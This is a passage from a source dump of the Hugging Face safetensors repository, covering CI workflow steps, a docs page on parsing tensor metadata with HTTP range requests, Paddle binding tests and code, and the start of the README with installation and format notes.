| shell: bash 132 | 133 | - name: Check style 134 | run: | 135 | pip install .[quality] 136 | ruff format --check . 137 | 138 | - name: Run tests 139 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm' 140 | run: | 141 | cargo test 142 | pip install ".[testing]" 143 | pytest -sv tests/ 144 | 145 | - name: Run tests (Windows arm64) 146 | if: matrix.os == 'windows-11-arm' 147 | run: | 148 | cargo test 149 | pip install ".[testing]" 150 | pytest -sv tests/ --ignore=tests/test_tf_comparison.py 151 | 152 | - name: Run tests (freethreaded) 153 | if: matrix.version.arch == 'x64-freethreaded' 154 | run: | 155 | cargo test 156 | pip install ".[testingfree]" 157 | pip install pytest numpy 158 | pytest -sv tests/test_pt* 159 | pytest -sv tests/test_simple.py 160 | 161 | test_s390x_big_endian: 162 | runs-on: ubuntu-latest 163 | permissions: 164 | contents: write 165 | packages: write 166 | name: Test bigendian - S390X 167 | steps: 168 | - uses: actions/checkout@v6 169 | - name: Set up QEMU 170 | uses: docker/setup-qemu-action@v3 171 | - name: Set up Docker Buildx 172 | uses: docker/setup-buildx-action@v3 173 | - name: Can push to GHCR? 174 | id: canpush 175 | shell: bash 176 | run: | 177 | echo "value=${{ github.event.pull_request.head.repo.fork == false }}" >> "$GITHUB_OUTPUT" 178 | - name: Docker meta 179 | id: meta 180 | uses: docker/metadata-action@v5 181 | with: 182 | # list of Docker images to use as base name for tags 183 | images: | 184 | ghcr.io/huggingface/safetensors/s390x 185 | # generate Docker tags based on the following events/attributes 186 | tags: | 187 | type=schedule 188 | type=ref,event=branch 189 | type=ref,event=pr 190 | type=semver,pattern={{version}} 191 | type=semver,pattern={{major}}.{{minor}} 192 | type=semver,pattern={{major}} 193 | type=sha 194 | - name: Login to Registry 195 | if: steps.canpush.outputs.value == 'true' 196 | uses: docker/login-action@v3 197 | with: 198 | registry: ghcr.io 199 | username: ${{ github.actor }} 200 | password: ${{ secrets.GITHUB_TOKEN }} 201 | - name: Test big endian 202 | uses: docker/build-push-action@v6 203 | with: 204 | platforms: linux/s390x 205 | file: Dockerfile.s390x.test 206 | tags: ${{ steps.meta.outputs.tags }} 207 | labels: ${{ steps.meta.outputs.labels }} 208 | cache-from: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }} 209 | cache-to: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }} 210 | push: ${{ steps.canpush.outputs.value == 'true' }} 211 | -------------------------------------------------------------------------------- /docs/source/metadata_parsing.mdx: -------------------------------------------------------------------------------- 1 | # Metadata Parsing 2 | 3 | Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests). 4 | 5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language. 6 | 7 | ## Example use case 8 | 9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights: 10 | 11 |
12 | 13 | 14 |
15 | 16 |
17 | 18 | 19 |
20 | 21 | ## Usage 22 | 23 | 24 | 25 | 26 | From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In this example python script below (you can use any language that has HTTP requests support), we are parsing metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors). 27 | 28 | ```python 29 | import requests # pip install requests 30 | import struct 31 | 32 | def parse_single_file(url): 33 | # Fetch the first 8 bytes of the file 34 | headers = {'Range': 'bytes=0-7'} 35 | response = requests.get(url, headers=headers) 36 | # Interpret the bytes as a little-endian unsigned 64-bit integer 37 | length_of_header = struct.unpack(' 60 | 61 | 62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js) 63 | 64 | ```ts 65 | import { parseSafetensorsMetadata } from "@huggingface/hub"; 66 | 67 | const info = await parseSafetensorsMetadata({ 68 | repo: { type: "model", name: "bigscience/bloom" }, 69 | }); 70 | 71 | console.log(info) 72 | // { 73 | // sharded: true, 74 | // index: { 75 | // metadata: { total_size: 352494542848 }, 76 | // weight_map: { 77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors', 78 | // ... 79 | // } 80 | // }, 81 | // headers: { 82 | // __metadata__: {'format': 'pt'}, 83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]}, 84 | // ... 85 | // } 86 | // } 87 | ``` 88 | 89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be: 90 | 91 | ```ts 92 | export type SafetensorsParseFromRepo = 93 | | { 94 | sharded: false; 95 | header: SafetensorsFileHeader; 96 | } 97 | | { 98 | sharded: true; 99 | index: SafetensorsIndexJson; 100 | headers: SafetensorsShardedHeaders; 101 | }; 102 | ``` 103 | 104 | where the underlying `types` are the following: 105 | 106 | ```ts 107 | type FileName = string; 108 | 109 | type TensorName = string; 110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL"; 111 | 112 | interface TensorInfo { 113 | dtype: Dtype; 114 | shape: number[]; 115 | data_offsets: [number, number]; 116 | } 117 | 118 | type SafetensorsFileHeader = Record & { 119 | __metadata__: Record; 120 | }; 121 | 122 | interface SafetensorsIndexJson { 123 | weight_map: Record; 124 | } 125 | 126 | export type SafetensorsShardedHeaders = Record; 127 | ``` 128 | 129 | 130 | 131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata. 132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model. 133 | Depending on if the model is sharded or not, one or multiple safetensors files will be parsed. 134 | 135 | ```python 136 | >>> from huggingface_hub import get_safetensors_metadata 137 | 138 | # Parse repo with single weights file 139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m") 140 | >>> metadata 141 | SafetensorsRepoMetadata( 142 | metadata=None, 143 | sharded=False, 144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...}, 145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)} 146 | ) 147 | >>> metadata.files_metadata["model.safetensors"].metadata 148 | {'format': 'pt'} 149 | 150 | # Parse repo with sharded model (i.e. multiple weights files) 151 | >>> metadata = get_safetensors_metadata("bigscience/bloom") 152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s] 153 | >>> metadata 154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...}) 155 | >>> len(metadata.files_metadata) 156 | 72 # All safetensors files have been fetched 157 | 158 | # Parse repo that is not a safetensors repo 159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5") 160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files. 161 | ``` 162 | 163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata). 164 | 165 | 166 | 167 | 168 | ## Example output 169 | 170 | For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage. 171 | 172 | model | safetensors | params 173 | --- | --- | --- 174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 } 175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 } 176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 } 177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 } 178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 } 179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 } 180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 } 181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 } 182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 } 183 | -------------------------------------------------------------------------------- /bindings/python/tests/test_paddle_comparison.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | import numpy as np 3 | 4 | from safetensors import safe_open 5 | 6 | 7 | try: 8 | import paddle 9 | from safetensors.paddle import load_file, save_file, save, load 10 | 11 | HAS_PADDLE = True 12 | except ImportError: 13 | HAS_PADDLE = False 14 | 15 | 16 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 17 | class SafeTestCase(unittest.TestCase): 18 | def setUp(self): 19 | data = { 20 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32), 21 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32), 22 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32), 23 | "test4": paddle.zeros((1024, 1024), dtype=paddle.complex64), 24 | } 25 | self.paddle_filename = "./tests/data/paddle_load.pdparams" 26 | self.sf_filename = "./tests/data/paddle_load.safetensors" 27 | 28 | paddle.save(data, self.paddle_filename) 29 | save_file(data, self.sf_filename) 30 | 31 | @unittest.expectedFailure 32 | def test_zero_sized(self): 33 | # This fails because paddle wants initialized tensor before 34 | # sending to numpy 35 | data = { 36 | "test": paddle.zeros((2, 0), dtype=paddle.float32), 37 | } 38 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors" 39 | save_file(data, local) 40 | reloaded = load_file(local) 41 | self.assertTrue(paddle.equal(data["test"], reloaded["test"])) 42 | 43 | def test_deserialization_safe(self): 44 | weights = load_file(self.sf_filename) 45 | 46 | paddle_weights = paddle.load(self.paddle_filename) 47 | for k, v in weights.items(): 48 | tv = paddle_weights[k] 49 | self.assertTrue(np.allclose(v, tv)) 50 | 51 | 52 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 53 | class WithOpenCase(unittest.TestCase): 54 | def test_paddle_tensor_cpu(self): 55 | A = paddle.randn((10, 5)) 56 | tensors = { 57 | "a": A, 58 | } 59 | save_file(tensors, "./tensor_paddle.safetensors") 60 | 61 | # Now loading cpu 62 | with safe_open( 63 | "./tensor_paddle.safetensors", framework="paddle", device="cpu" 64 | ) as f: 65 | tensor = f.get_tensor("a") 66 | self.assertEqual(list(tensor.shape), [10, 5]) 67 | assert paddle.allclose(tensor, A).item() 68 | assert not tensor.place.is_gpu_place() 69 | 70 | def test_paddle_tensor_gpu(self): 71 | A = paddle.randn((10, 5)) 72 | tensors = { 73 | "a": A, 74 | } 75 | save_file(tensors, "./tensor_paddle.safetensors") 76 | # Now loading gpu 77 | with safe_open( 78 | "./tensor_paddle.safetensors", framework="paddle", device="cuda" 79 | ) as f: 80 | tensor = f.get_tensor("a") 81 | self.assertEqual(list(tensor.shape), [10, 5]) 82 | assert paddle.allclose(tensor, A).item() 83 | assert tensor.place.is_gpu_place() 84 | 85 | def test_paddle_slice_cpu(self): 86 | A = paddle.randn((10, 5)) 87 | tensors = { 88 | "a": A, 89 | } 90 | save_file(tensors, "./slice_paddle.safetensors") 91 | 92 | # Now loading 93 | with safe_open( 94 | "./slice_paddle.safetensors", framework="paddle", device="cpu" 95 | ) as f: 96 | slice_ = f.get_slice("a") 97 | tensor = slice_[:] 98 | self.assertEqual(list(tensor.shape), [10, 5]) 99 | assert paddle.allclose(tensor, A).item() 100 | assert not tensor.place.is_gpu_place() 101 | 102 | tensor = slice_[tuple()] 103 | self.assertEqual(list(tensor.shape), [10, 5]) 104 | assert paddle.allclose(tensor, A).item() 105 | assert not tensor.place.is_gpu_place() 106 | 107 | tensor = slice_[:2] 108 | self.assertEqual(list(tensor.shape), [2, 5]) 109 | assert paddle.allclose(tensor, A[:2]).item() 110 | assert not tensor.place.is_gpu_place() 111 | 112 | tensor = slice_[:, :2] 113 | self.assertEqual(list(tensor.shape), [10, 2]) 114 | assert paddle.allclose(tensor, A[:, :2]).item() 115 | assert not tensor.place.is_gpu_place() 116 | 117 | tensor = slice_[0, :2] 118 | self.assertEqual(list(tensor.shape), [2]) 119 | assert paddle.allclose(tensor, A[0, :2]).item() 120 | assert not tensor.place.is_gpu_place() 121 | 122 | tensor = slice_[2:, 0] 123 | self.assertEqual(list(tensor.shape), [8]) 124 | assert paddle.allclose(tensor, A[2:, 0]).item() 125 | assert not tensor.place.is_gpu_place() 126 | 127 | tensor = slice_[2:, 1] 128 | self.assertEqual(list(tensor.shape), [8]) 129 | assert paddle.allclose(tensor, A[2:, 1]).item() 130 | assert not tensor.place.is_gpu_place() 131 | 132 | tensor = slice_[2:, -1] 133 | self.assertEqual(list(tensor.shape), [8]) 134 | assert paddle.allclose(tensor, A[2:, -1]).item() 135 | assert not tensor.place.is_gpu_place() 136 | 137 | tensor = slice_[list()] 138 | self.assertEqual(list(tensor.shape), [0, 5]) 139 | assert paddle.allclose(tensor, A[list()]).item() 140 | assert not tensor.place.is_gpu_place() 141 | 142 | def test_paddle_slice_gpu(self): 143 | A = paddle.randn((10, 5)) 144 | tensors = { 145 | "a": A, 146 | } 147 | save_file(tensors, "./slice_paddle.safetensors") 148 | 149 | # Now loading 150 | with safe_open( 151 | "./slice_paddle.safetensors", framework="paddle", device="cuda" 152 | ) as f: 153 | slice_ = f.get_slice("a") 154 | tensor = slice_[:] 155 | self.assertEqual(list(tensor.shape), [10, 5]) 156 | assert paddle.allclose(tensor, A).item() 157 | assert tensor.place.is_gpu_place() 158 | 159 | tensor = slice_[tuple()] 160 | self.assertEqual(list(tensor.shape), [10, 5]) 161 | assert paddle.allclose(tensor, A).item() 162 | assert tensor.place.is_gpu_place() 163 | 164 | tensor = slice_[:2] 165 | self.assertEqual(list(tensor.shape), [2, 5]) 166 | assert paddle.allclose(tensor, A[:2]).item() 167 | assert tensor.place.is_gpu_place() 168 | 169 | tensor = slice_[:, :2] 170 | self.assertEqual(list(tensor.shape), [10, 2]) 171 | assert paddle.allclose(tensor, A[:, :2]).item() 172 | assert tensor.place.is_gpu_place() 173 | 174 | tensor = slice_[0, :2] 175 | self.assertEqual(list(tensor.shape), [2]) 176 | assert paddle.allclose(tensor, A[0, :2]).item() 177 | assert tensor.place.is_gpu_place() 178 | 179 | tensor = slice_[2:, 0] 180 | self.assertEqual(list(tensor.shape), [8]) 181 | assert paddle.allclose(tensor, A[2:, 0]).item() 182 | assert tensor.place.is_gpu_place() 183 | 184 | tensor = slice_[2:, 1] 185 | self.assertEqual(list(tensor.shape), [8]) 186 | assert paddle.allclose(tensor, A[2:, 1]).item() 187 | assert tensor.place.is_gpu_place() 188 | 189 | tensor = slice_[2:, -1] 190 | self.assertEqual(list(tensor.shape), [8]) 191 | assert paddle.allclose(tensor, A[2:, -1]).item() 192 | assert tensor.place.is_gpu_place() 193 | 194 | tensor = slice_[list()] 195 | self.assertEqual(list(tensor.shape), [0, 5]) 196 | assert paddle.allclose(tensor, A[list()]).item() 197 | assert tensor.place.is_gpu_place() 198 | 199 | 200 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 201 | class SaveLoadCase(unittest.TestCase): 202 | def test_in_memory(self): 203 | data = { 204 | "test": paddle.zeros((2, 2), dtype=paddle.float32), 205 | } 206 | binary = save(data) 207 | self.assertEqual( 208 | binary, 209 | # Spaces are for forcing the alignment. 210 | b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"F32","shape":[2,2],"data_offsets":[0,16]}} ' 211 | b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 212 | ) 213 | reloaded = load(binary) 214 | out = paddle.equal(data["test"], reloaded["test"]) 215 | self.assertTrue(paddle.all(out)) 216 | 217 | def test_save_load_cpu(self): 218 | if paddle.__version__ >= "3.2.0": 219 | self.dtype = paddle.bfloat16 220 | else: 221 | self.dtype = paddle.float32 222 | data = { 223 | "test": paddle.randn((2, 2), dtype=self.dtype), 224 | } 225 | self.sf_filename = "./tests/data/paddle_save_load_cpu.safetensors" 226 | save_file(data, self.sf_filename) 227 | reloaded = load(open(self.sf_filename, "rb").read()) 228 | out = paddle.equal(data["test"], reloaded["test"]) 229 | self.assertTrue(paddle.all(out)) 230 | 231 | def test_odd_dtype(self): 232 | if paddle.__version__ >= "3.2.0": 233 | data = { 234 | "test1": paddle.randn((2, 2), dtype=paddle.bfloat16), 235 | "test2": paddle.randn((2, 2), dtype=paddle.float32), 236 | } 237 | self.sf_filename = "./tests/data/paddle_save_load_type.safetensors" 238 | save_file(data, self.sf_filename) 239 | reloaded = load_file(self.sf_filename) 240 | self.assertTrue(paddle.all(paddle.equal(data["test1"], reloaded["test1"]))) 241 | self.assertEqual(reloaded["test1"].dtype, paddle.bfloat16) 242 | self.assertTrue(paddle.all(paddle.equal(data["test2"], reloaded["test2"]))) 243 | self.assertEqual(reloaded["test2"].dtype, paddle.float32) 244 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from typing import Any, Dict, List, Optional, Union 4 | 5 | import numpy as np 6 | import paddle 7 | 8 | from safetensors import numpy, deserialize, safe_open, serialize, serialize_file 9 | 10 | 11 | def save( 12 | tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None 13 | ) -> bytes: 14 | """ 15 | Saves a dictionary of tensors into raw bytes in safetensors format. 16 | 17 | Args: 18 | tensors (`Dict[str, paddle.Tensor]`): 19 | The incoming tensors. Tensors need to be contiguous and dense. 20 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 21 | Optional text only metadata you might want to save in your header. 22 | For instance it can be useful to specify more about the underlying 23 | tensors. This is purely informative and does not affect tensor loading. 24 | 25 | Returns: 26 | `bytes`: The raw bytes representing the format 27 | 28 | Example: 29 | 30 | ```python 31 | from safetensors.paddle import save 32 | import paddle 33 | 34 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 35 | byte_data = save(tensors) 36 | ``` 37 | """ 38 | keep_references_alive = [] 39 | serialized = serialize(_flatten(tensors, keep_references_alive), metadata=metadata) 40 | result = bytes(serialized) 41 | return result 42 | 43 | 44 | def save_file( 45 | tensors: Dict[str, paddle.Tensor], 46 | filename: Union[str, os.PathLike], 47 | metadata: Optional[Dict[str, str]] = None, 48 | ) -> None: 49 | """ 50 | Saves a dictionary of tensors into raw bytes in safetensors format. 51 | 52 | Args: 53 | tensors (`Dict[str, paddle.Tensor]`): 54 | The incoming tensors. Tensors need to be contiguous and dense. 55 | filename (`str`, or `os.PathLike`)): 56 | The filename we're saving into. 57 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 58 | Optional text only metadata you might want to save in your header. 59 | For instance it can be useful to specify more about the underlying 60 | tensors. This is purely informative and does not affect tensor loading. 61 | 62 | Returns: 63 | `None` 64 | 65 | Example: 66 | 67 | ```python 68 | from safetensors.paddle import save_file 69 | import paddle 70 | 71 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 72 | save_file(tensors, "model.safetensors") 73 | ``` 74 | """ 75 | keep_references_alive = [] 76 | serialize_file( 77 | _flatten(tensors, keep_references_alive), filename, metadata=metadata 78 | ) 79 | 80 | 81 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]: 82 | """ 83 | Loads a safetensors file into paddle format from pure bytes. 84 | 85 | Args: 86 | data (`bytes`): 87 | The content of a safetensors file 88 | 89 | Returns: 90 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu 91 | 92 | Example: 93 | 94 | ```python 95 | from safetensors.paddle import load 96 | 97 | file_path = "./my_folder/bert.safetensors" 98 | with open(file_path, "rb") as f: 99 | data = f.read() 100 | 101 | loaded = load(data) 102 | ``` 103 | """ 104 | if paddle.__version__ >= "3.2.0": 105 | flat = deserialize(data) 106 | return _view2paddle(flat, device) 107 | else: 108 | flat = numpy.load(data) 109 | return _np2paddle(flat, device) 110 | 111 | 112 | def load_file( 113 | filename: Union[str, os.PathLike], device="cpu" 114 | ) -> Dict[str, paddle.Tensor]: 115 | """ 116 | Loads a safetensors file into paddle format. 117 | 118 | Args: 119 | filename (`str`, or `os.PathLike`)): 120 | The name of the file which contains the tensors 121 | device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`): 122 | The device where the tensors need to be located after load. 123 | available options are all regular paddle device locations 124 | 125 | Returns: 126 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` 127 | 128 | Example: 129 | 130 | ```python 131 | from safetensors.paddle import load_file 132 | 133 | file_path = "./my_folder/bert.safetensors" 134 | loaded = load_file(file_path) 135 | ``` 136 | """ 137 | result = {} 138 | if paddle.__version__ >= "3.2.0": 139 | with safe_open(filename, framework="paddle", device=device) as f: 140 | for k in f.offset_keys(): 141 | result[k] = f.get_tensor(k) 142 | else: 143 | flat = numpy.load_file(filename) 144 | result = _np2paddle(flat, device) 145 | return result 146 | 147 | 148 | def _np2paddle( 149 | numpy_dict: Dict[str, np.ndarray], device: str = "cpu" 150 | ) -> Dict[str, paddle.Tensor]: 151 | for k, v in numpy_dict.items(): 152 | numpy_dict[k] = paddle.to_tensor(v, place=device) 153 | return numpy_dict 154 | 155 | 156 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]: 157 | for k, v in paddle_dict.items(): 158 | paddle_dict[k] = v.detach().cpu().numpy() 159 | return paddle_dict 160 | 161 | 162 | _SIZE = { 163 | paddle.int64: 8, 164 | paddle.float32: 4, 165 | paddle.int32: 4, 166 | paddle.bfloat16: 2, 167 | paddle.float16: 2, 168 | paddle.int16: 2, 169 | paddle.uint8: 1, 170 | paddle.int8: 1, 171 | paddle.bool: 1, 172 | paddle.float64: 8, 173 | paddle.float8_e4m3fn: 1, 174 | paddle.float8_e5m2: 1, 175 | paddle.complex64: 8, 176 | # XXX: These are not supported yet in paddle 177 | # paddle.uint64: 8, 178 | # paddle.uint32: 4, 179 | # paddle.uint16: 2, 180 | # paddle.float8_e8m0: 1, 181 | # paddle.float4_e2m1_x2: 1, 182 | } 183 | 184 | _TYPES = { 185 | "F64": paddle.float64, 186 | "F32": paddle.float32, 187 | "F16": paddle.float16, 188 | "BF16": paddle.bfloat16, 189 | "I64": paddle.int64, 190 | "I32": paddle.int32, 191 | "I16": paddle.int16, 192 | "I8": paddle.int8, 193 | "U8": paddle.uint8, 194 | "BOOL": paddle.bool, 195 | "F8_E4M3": paddle.float8_e4m3fn, 196 | "F8_E5M2": paddle.float8_e5m2, 197 | } 198 | 199 | NPDTYPES = { 200 | paddle.int64: np.int64, 201 | paddle.float32: np.float32, 202 | paddle.int32: np.int32, 203 | # XXX: This is ok because both have the same width 204 | paddle.bfloat16: np.float16, 205 | paddle.float16: np.float16, 206 | paddle.int16: np.int16, 207 | paddle.uint8: np.uint8, 208 | paddle.int8: np.int8, 209 | paddle.bool: bool, 210 | paddle.float64: np.float64, 211 | # XXX: This is ok because both have the same width and byteswap is a no-op anyway 212 | paddle.float8_e4m3fn: np.uint8, 213 | paddle.float8_e5m2: np.uint8, 214 | } 215 | 216 | 217 | def _getdtype(dtype_str: str) -> paddle.dtype: 218 | return _TYPES[dtype_str] 219 | 220 | 221 | def _view2paddle(safeview, device) -> Dict[str, paddle.Tensor]: 222 | result = {} 223 | for k, v in safeview: 224 | dtype = _getdtype(v["dtype"]) 225 | if len(v["data"]) == 0: 226 | # Workaround because frombuffer doesn't accept zero-size tensors 227 | assert any(x == 0 for x in v["shape"]) 228 | arr = paddle.empty(v["shape"], dtype=dtype) 229 | else: 230 | arr = paddle.base.core.frombuffer(v["data"], dtype).reshape(v["shape"]) 231 | if device != "cpu": 232 | arr = arr.to(device) 233 | if sys.byteorder == "big": 234 | arr = paddle.to_tensor(arr.numpy().byteswap(inplace=False), place=device) 235 | result[k] = arr 236 | 237 | return result 238 | 239 | 240 | def _to_ndarray(tensor: paddle.Tensor, name: str): 241 | if not tensor.is_contiguous(): 242 | raise ValueError( 243 | f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you" 244 | " are trying to save tensors which are reference of each other in which case it's recommended to save" 245 | " only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to" 246 | " pack it before saving." 247 | ) 248 | if not tensor.place.is_cpu_place(): 249 | # Moving tensor to cpu before saving 250 | tensor = tensor.cpu() 251 | 252 | import ctypes 253 | 254 | # When shape is empty (scalar), np.prod returns a float 255 | # we need a int for the following calculations 256 | length = int(np.prod(tensor.shape).item()) 257 | bytes_per_item = _SIZE[tensor.dtype] 258 | 259 | total_bytes = length * bytes_per_item 260 | 261 | ptr = tensor.data_ptr() 262 | if ptr == 0: 263 | return np.empty( 264 | 0 265 | ), 0 # XXX: bogus value we don't really care if we return a tensor here 266 | newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte)) 267 | data = np.ctypeslib.as_array(newptr, (total_bytes,)) # no internal copy 268 | if sys.byteorder == "big": 269 | npdtype = NPDTYPES[tensor.dtype] 270 | # Not in place as that would potentially modify a live running model 271 | data = data.view(npdtype).byteswap(inplace=False) 272 | return data, tensor 273 | 274 | 275 | def _flatten( 276 | tensors: Dict[str, paddle.Tensor], keep_alive_buffer: List 277 | ) -> Dict[str, Dict[str, Any]]: 278 | if not isinstance(tensors, dict): 279 | raise ValueError( 280 | f"Expected a dict of [str, paddle.Tensor] but received {type(tensors)}" 281 | ) 282 | 283 | for k, v in tensors.items(): 284 | if not isinstance(v, paddle.Tensor): 285 | raise ValueError( 286 | f"Key `{k}` is invalid, expected paddle.Tensor but received {type(v)}" 287 | ) 288 | 289 | flattened = {} 290 | for k, v in tensors.items(): 291 | arr, tensor_ref = _to_ndarray(v, k) 292 | keep_alive_buffer.append((arr, tensor_ref)) 293 | flattened[k] = { 294 | "dtype": str(v.dtype).split(".")[-1], 295 | "shape": v.shape, 296 | "data_ptr": arr.ctypes.data, 297 | "data_len": arr.nbytes, 298 | } 299 | return flattened 300 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | 4 | 5 | Hugging Face Safetensors Library 6 | 7 |
8 |
9 |

10 | 11 | Python 12 | [![Pypi](https://img.shields.io/pypi/v/safetensors.svg)](https://pypi.org/pypi/safetensors/) 13 | [![Documentation](https://img.shields.io/website/http/huggingface.co/docs/safetensors/index.svg?label=docs)](https://huggingface.co/docs/safetensors/index) 14 | [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) 15 | [![Downloads](https://static.pepy.tech/badge/safetensors/month)](https://pepy.tech/project/safetensors) 16 | 17 | Rust 18 | [![Crates.io](https://img.shields.io/crates/v/safetensors.svg)](https://crates.io/crates/safetensors) 19 | [![Documentation](https://docs.rs/safetensors/badge.svg)](https://docs.rs/safetensors/) 20 | [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) 21 | [![Dependency status](https://deps.rs/repo/github/huggingface/safetensors/status.svg?path=safetensors)](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors) 22 | 23 | # safetensors 24 | 25 | ## Safetensors 26 | 27 | This repository implements a new simple format for storing tensors 28 | safely (as opposed to pickle) and that is still fast (zero-copy). 29 | 30 | ### Installation 31 | #### Pip 32 | 33 | You can install safetensors via the pip manager: 34 | 35 | ```bash 36 | pip install safetensors 37 | ``` 38 | 39 | #### From source 40 | 41 | For the sources, you need Rust 42 | 43 | ```bash 44 | # Install Rust 45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 46 | # Make sure it's up to date and using stable channel 47 | rustup update 48 | git clone https://github.com/huggingface/safetensors 49 | cd safetensors/bindings/python 50 | pip install setuptools_rust 51 | pip install -e . 52 | ``` 53 | 54 | ### Getting started 55 | 56 | ```python 57 | import torch 58 | from safetensors import safe_open 59 | from safetensors.torch import save_file 60 | 61 | tensors = { 62 | "weight1": torch.zeros((1024, 1024)), 63 | "weight2": torch.zeros((1024, 1024)) 64 | } 65 | save_file(tensors, "model.safetensors") 66 | 67 | tensors = {} 68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f: 69 | for key in f.keys(): 70 | tensors[key] = f.get_tensor(key) 71 | ``` 72 | 73 | [Python documentation](https://huggingface.co/docs/safetensors/index) 74 | 75 | 76 | ### Format 77 | 78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header 79 | - N bytes: a JSON UTF-8 string representing the header. 80 | - The header data MUST begin with a `{` character (0x7B). 81 | - The header data MAY be trailing padded with whitespace (0x20). 82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`, 83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an 